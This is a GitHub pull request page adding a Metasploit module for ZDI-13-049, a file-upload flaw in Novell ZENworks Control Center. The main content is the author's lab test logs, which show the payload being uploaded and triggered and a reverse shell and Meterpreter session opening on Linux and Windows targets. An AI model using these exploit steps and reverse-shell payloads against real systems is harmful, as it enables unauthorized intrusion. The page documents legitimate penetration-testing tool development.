Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added module for ZDI-13-049 #1691

Merged
merged 3 commits into from Mar 31, 2013
Merged

Added module for ZDI-13-049 #1691

merged 3 commits into from Mar 31, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested successfully on ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE Linux Enterprise Server 10 SP3

  • Test on Linux
msf exploit(zenworks_control_center_upload) > show options

Module options (exploit/multi/http/zenworks_control_center_upload):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    443              yes       The target port
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3


msf exploit(zenworks_control_center_upload) > set rhost 192.168.1.146
rhost => 192.168.1.146
msf exploit(zenworks_control_center_upload) > check
[*] The target service is running, but could not be validated.
msf exploit(zenworks_control_center_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] Uploading 1688 bytes as Dhsx6H.war ...
[*] Upload finished, waiting 20 seconds for payload deployment...
[*] Triggering payload at '/Dhsx6H/JR9EGXKxhvE.jsp' ...
[*] Command shell session 1 opened (192.168.1.129:4444 -> 192.168.1.146:47098) at 2013-03-30 19:32:05 +0100

id
uid=103(zenworks) gid=105(zenworks) groups=105(zenworks),106(zmanusers),107(casaauth)
uname -a
Linux linux-0u1f 2.6.16.60-0.54.5-default #1 Fri Sep 4 01:28:03 UTC 2009 i686 i686 i386 GNU/Linux
  • Test on Windows

msf exploit(zenworks_control_center_upload) > set target 0
target => 0
msf exploit(zenworks_control_center_upload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(zenworks_control_center_upload) > set rhost 192.168.1.145
rhost => 192.168.1.145
msf exploit(zenworks_control_center_upload) > check
r[*] The target service is running, but could not be validated.
msf exploit(zenworks_control_center_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] Uploading 52215 bytes as jwven.war ...
[*] Upload finished, waiting 20 seconds for payload deployment...
[*] Triggering payload at '/jwven/jQtgKERzenc.jsp' ...
[*] Sending stage (752128 bytes) to 192.168.1.145
[*] Meterpreter session 2 opened (192.168.1.129:4444 -> 192.168.1.145:1220) at 2013-03-30 19:34:07 +0100

meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\__z_1_145__

@wchen-r7 wchen-r7 merged commit 315abd8 into rapid7:master Mar 31, 2013
@coveralls
Copy link

Coverage Status

Changes Unknown when pulling 315abd8 on jvazquez-r7:zenworks_control_center_upload into * on rapid7:master*.

@jvazquez-r7 jvazquez-r7 deleted the zenworks_control_center_upload branch November 18, 2014 15:59
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @coveralls @wchen-r7